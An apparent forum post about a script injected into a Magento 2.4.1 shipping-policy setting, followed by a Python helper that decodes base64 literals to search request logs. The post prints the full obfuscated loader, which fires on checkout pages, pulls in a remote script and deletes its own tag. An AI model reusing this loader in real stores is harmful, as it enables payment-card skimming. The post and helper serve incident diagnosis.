
Script injected in Magento 2.4.1 at shipping_policy_content

We found a script like this in shipping/shipping_policy/shipping_policy_content:

<script id="shopcart">((g,r,w,s,t,o) => {if(g.location.href.indexOf(atob(t))>-1){a=r.createElement(w);a.id="carthelper";a.async=1;a.src=atob(o);r.body.appendChild(a);}if(document.querySelector("#shopcart")){document.querySelector("#shopcart").remove();}})(window,document,"script","gCaptcha","Y2hlY2tvdXQ","aHR0cHM6Ly9zdGF0aWMud2ViYWdlbmN5YW5hbHl0aWNzLmNvbS9tYWluLmpzP3Y9MS4wLjM")</script>

Which translates to https://static.webagencyanalytics.com/main.js?v=1.0.3

I’m trying to determine how this was injected, but I can’t find references to the script itself, the base64-encoded string, or the decoded string.

Any ideas how I can detect the root cause?

I’m using ModSecurity and I’m already logging GET/POST requests for this.
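A triage helper for the situation described in the post, added here as an example and not part of the original post: it pulls quoted literals out of `<script>` blocks in a stored config value, decodes the ones that are valid base64 text, and builds raw and percent-encoded strings to search for in the request logs. The function names are hypothetical and the sample value is abridged from the script quoted above.

```python
import base64
import re
from urllib.parse import quote, urlsplit

# Abridged from the script in the post: the function body is replaced by
# "...", the call arguments are unchanged.
SAMPLE_VALUE = (
    '<p>Shipping policy</p><script id="shopcart">((g,r,w,s,t,o) => {...})'
    '(window,document,"script","gCaptcha","Y2hlY2tvdXQ",'
    '"aHR0cHM6Ly9zdGF0aWMud2ViYWdlbmN5YW5hbHl0aWNzLmNvbS9tYWluLmpzP3Y9MS4wLjM")'
    '</script>'
)

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
LITERAL_RE = re.compile(r"""["']([A-Za-z0-9+/]{8,}={0,2})["']""")


def decode_literals(value):
    """Return (literal, decoded_text) for base64 literals inside <script> blocks."""
    found = []
    for body in SCRIPT_RE.findall(value):
        for lit in LITERAL_RE.findall(body):
            raw = lit.rstrip("=")
            if len(raw) % 4 == 1:          # impossible base64 length
                continue
            raw += "=" * (-len(raw) % 4)   # atob() accepts missing padding
            try:
                data = base64.b64decode(raw, validate=True)
            except ValueError:
                continue
            # Keep only results that are printable ASCII; plain identifiers
            # such as "gCaptcha" decode to binary noise and are dropped.
            if data and all(0x20 <= b < 0x7F for b in data):
                found.append((lit, data.decode("ascii")))
    return found


def log_needles(value):
    """Strings to search for in request logs, raw and percent-encoded."""
    needles = set()
    for lit, text in decode_literals(value):
        needles.update({lit, text, quote(text, safe="")})
        host = urlsplit(text).hostname
        if host:
            needles.add(host)
    return needles
```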